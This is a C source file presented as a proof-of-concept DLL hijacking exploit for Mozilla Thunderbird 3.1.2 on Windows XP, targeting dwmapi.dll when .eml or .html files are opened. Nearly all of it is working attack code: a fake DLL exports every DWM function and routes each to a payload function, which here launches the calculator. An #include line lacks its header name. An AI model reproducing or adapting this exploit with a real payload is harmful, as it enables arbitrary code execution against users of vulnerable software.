/* Exploit Title: Mozilla Thunderbird DLL Hijacking Exploit ( dwmapi.dll ) Date: 26/08/2010 Author: h4ck3r#47 http://twitter.com/hxteam Version: Latest Mozilla Thunderbird 3.1.2 Tested on: Windows XP SP3 The code is based on the exploit from "TheLeader" Vulnerable extensions: .eml .html */ #include #define DLLIMPORT __declspec (dllexport) DLLIMPORT void DwmDefWindowProc() { evil(); } DLLIMPORT void DwmEnableBlurBehindWindow() { evil(); } DLLIMPORT void DwmEnableComposition() { evil(); } DLLIMPORT void DwmEnableMMCSS() { evil(); } DLLIMPORT void DwmExtendFrameIntoClientArea() { evil(); } DLLIMPORT void DwmGetColorizationColor() { evil(); } DLLIMPORT void DwmGetCompositionTimingInfo() { evil(); } DLLIMPORT void DwmGetWindowAttribute() { evil(); } DLLIMPORT void DwmIsCompositionEnabled() { evil(); } DLLIMPORT void DwmModifyPreviousDxFrameDuration() { evil(); } DLLIMPORT void DwmQueryThumbnailSourceSize() { evil(); } DLLIMPORT void DwmRegisterThumbnail() { evil(); } DLLIMPORT void DwmSetDxFrameDuration() { evil(); } DLLIMPORT void DwmSetPresentParameters() { evil(); } DLLIMPORT void DwmSetWindowAttribute() { evil(); } DLLIMPORT void DwmUnregisterThumbnail() { evil(); } DLLIMPORT void DwmUpdateThumbnailProperties() { evil(); } int evil() { WinExec("calc", 0); exit(0); return 0; }